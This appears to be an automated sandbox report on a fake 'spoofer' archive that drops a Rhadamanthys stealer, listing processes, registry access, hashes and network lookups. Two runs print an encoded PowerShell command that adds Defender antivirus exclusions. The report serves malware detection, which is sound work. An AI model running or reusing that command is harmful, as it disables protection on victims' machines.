Analysis Overview
SHA256
939cdd940184fa0be3ac8de9330d66e144d93396098713278e736e6ab1396f72
Threat Level: Known bad
The file anubisspoofer.rar was found to be: Known bad.
Malicious Activity Summary
Detect rhadamanthys stealer shellcode
Rhadamanthys
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-28 09:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win7-20240903-en
Max time kernel
146s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2384 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2384 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2384 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\rundll32.exe |
| PID 2688 wrote to memory of 2900 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files\VideoLAN\VLC\vlc.exe |
| PID 2688 wrote to memory of 2900 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files\VideoLAN\VLC\vlc.exe |
| PID 2688 wrote to memory of 2900 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files\VideoLAN\VLC\vlc.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar"
Network
Files
memory/2900-31-0x000000013F960000-0x000000013FA58000-memory.dmp
memory/2900-32-0x000007FEFA7B0000-0x000007FEFA7E4000-memory.dmp
memory/2900-34-0x000007FEFAA70000-0x000007FEFAA88000-memory.dmp
memory/2900-40-0x000007FEF5860000-0x000007FEF5871000-memory.dmp
memory/2900-39-0x000007FEF5880000-0x000007FEF589D000-memory.dmp
memory/2900-38-0x000007FEF58A0000-0x000007FEF58B1000-memory.dmp
memory/2900-37-0x000007FEF6B00000-0x000007FEF6B17000-memory.dmp
memory/2900-36-0x000007FEF6B20000-0x000007FEF6B31000-memory.dmp
memory/2900-35-0x000007FEFA790000-0x000007FEFA7A7000-memory.dmp
memory/2900-33-0x000007FEF59F0000-0x000007FEF5CA6000-memory.dmp
memory/2900-41-0x000007FEF5650000-0x000007FEF585B000-memory.dmp
memory/2900-49-0x000007FEF4480000-0x000007FEF449B000-memory.dmp
memory/2900-48-0x000007FEF44A0000-0x000007FEF44B1000-memory.dmp
memory/2900-47-0x000007FEF44C0000-0x000007FEF44D1000-memory.dmp
memory/2900-46-0x000007FEF44E0000-0x000007FEF44F1000-memory.dmp
memory/2900-45-0x000007FEF4500000-0x000007FEF4518000-memory.dmp
memory/2900-44-0x000007FEF4520000-0x000007FEF4541000-memory.dmp
memory/2900-43-0x000007FEF4550000-0x000007FEF4591000-memory.dmp
memory/2900-51-0x000007FEF4440000-0x000007FEF4458000-memory.dmp
memory/2900-53-0x000007FEF43A0000-0x000007FEF4407000-memory.dmp
memory/2900-61-0x000007FEF41D0000-0x000007FEF41E1000-memory.dmp
memory/2900-62-0x000007FEF41B0000-0x000007FEF41C2000-memory.dmp
memory/2900-60-0x000007FEF41F0000-0x000007FEF4213000-memory.dmp
memory/2900-56-0x000007FEF42A0000-0x000007FEF42F7000-memory.dmp
memory/2900-59-0x000007FEF4220000-0x000007FEF4238000-memory.dmp
memory/2900-58-0x000007FEF4240000-0x000007FEF4264000-memory.dmp
memory/2900-57-0x000007FEF4270000-0x000007FEF4298000-memory.dmp
memory/2900-55-0x000007FEF4300000-0x000007FEF4311000-memory.dmp
memory/2900-52-0x000007FEF4410000-0x000007FEF4440000-memory.dmp
memory/2900-54-0x000007FEF4320000-0x000007FEF439C000-memory.dmp
memory/2900-42-0x000007FEF45A0000-0x000007FEF5650000-memory.dmp
memory/2900-50-0x000007FEF4460000-0x000007FEF4471000-memory.dmp
memory/2900-63-0x000007FEF31B0000-0x000007FEF3330000-memory.dmp
memory/2900-64-0x000007FEF7FB0000-0x000007FEF7FC7000-memory.dmp
memory/2900-65-0x000007FEFAFE0000-0x000007FEFAFF0000-memory.dmp
memory/2900-66-0x000007FEF7F80000-0x000007FEF7FAF000-memory.dmp
memory/2900-67-0x000007FEF7F60000-0x000007FEF7F71000-memory.dmp
memory/2900-68-0x000007FEF7F40000-0x000007FEF7F56000-memory.dmp
memory/2900-69-0x000007FEF30E0000-0x000007FEF31A5000-memory.dmp
memory/2900-70-0x000007FEF3090000-0x000007FEF30D2000-memory.dmp
memory/2900-71-0x000007FEF2E20000-0x000007FEF2E82000-memory.dmp
memory/2900-72-0x000007FEF3020000-0x000007FEF308D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win7-20240903-en
Max time kernel
14s
Max time network
18s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anubis.exe
"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
Network
Files
\Users\Admin\AppData\Local\Temp\Launcher.exe
| MD5 | a8db312e9364d1d82600bf5a398212fe |
| SHA1 | 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb |
| SHA256 | 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb |
| SHA512 | a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782 |
\Users\Admin\AppData\Local\Temp\WindowsHost.exe
| MD5 | 515a0c8be21a5ba836e5687fc2d73333 |
| SHA1 | c52be9d0d37ac1b8d6bc09860e68e9e0615255ab |
| SHA256 | 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae |
| SHA512 | 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522 |
memory/2932-17-0x0000000000230000-0x0000000000237000-memory.dmp
memory/2932-18-0x0000000001F80000-0x0000000002380000-memory.dmp
memory/2932-19-0x0000000001F80000-0x0000000002380000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:57
Platform
win10v2004-20240802-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anubis.exe
"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
| MD5 | a8db312e9364d1d82600bf5a398212fe |
| SHA1 | 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb |
| SHA256 | 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb |
| SHA512 | a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782 |
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
| MD5 | 515a0c8be21a5ba836e5687fc2d73333 |
| SHA1 | c52be9d0d37ac1b8d6bc09860e68e9e0615255ab |
| SHA256 | 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae |
| SHA512 | 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522 |
memory/2716-16-0x000000007422E000-0x000000007422F000-memory.dmp
memory/2716-17-0x0000000004C60000-0x0000000004C96000-memory.dmp
memory/2716-18-0x0000000074220000-0x00000000749D0000-memory.dmp
memory/2716-19-0x0000000005350000-0x0000000005978000-memory.dmp
memory/2716-20-0x0000000074220000-0x00000000749D0000-memory.dmp
memory/2716-21-0x0000000005270000-0x0000000005292000-memory.dmp
memory/2716-23-0x0000000005BE0000-0x0000000005C46000-memory.dmp
memory/2716-22-0x0000000005B70000-0x0000000005BD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5dae4za.q2s.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2716-33-0x0000000005C50000-0x0000000005FA4000-memory.dmp
memory/2716-34-0x0000000006240000-0x000000000625E000-memory.dmp
memory/2716-35-0x0000000006260000-0x00000000062AC000-memory.dmp
memory/2716-36-0x0000000006810000-0x0000000006842000-memory.dmp
memory/2716-37-0x0000000073DE0000-0x0000000073E2C000-memory.dmp
memory/2716-47-0x00000000067D0000-0x00000000067EE000-memory.dmp
memory/2716-48-0x0000000007290000-0x0000000007333000-memory.dmp
memory/2716-49-0x0000000007BC0000-0x000000000823A000-memory.dmp
memory/2716-50-0x0000000007560000-0x000000000757A000-memory.dmp
memory/3584-51-0x00000000021B0000-0x00000000021B7000-memory.dmp
memory/3584-52-0x00000000022A0000-0x00000000026A0000-memory.dmp
memory/3584-53-0x00000000022A0000-0x00000000026A0000-memory.dmp
memory/2716-54-0x00000000075D0000-0x00000000075DA000-memory.dmp
memory/2716-55-0x00000000077F0000-0x0000000007886000-memory.dmp
memory/2716-56-0x0000000007760000-0x0000000007771000-memory.dmp
memory/2716-57-0x00000000077A0000-0x00000000077AE000-memory.dmp
memory/2716-58-0x00000000077B0000-0x00000000077C4000-memory.dmp
memory/2716-59-0x0000000007890000-0x00000000078AA000-memory.dmp
memory/2716-60-0x00000000077E0000-0x00000000077E8000-memory.dmp
memory/2716-63-0x0000000074220000-0x00000000749D0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1708 wrote to memory of 1444 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 1708 wrote to memory of 1444 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 1708 wrote to memory of 1444 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1708 -s 260
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |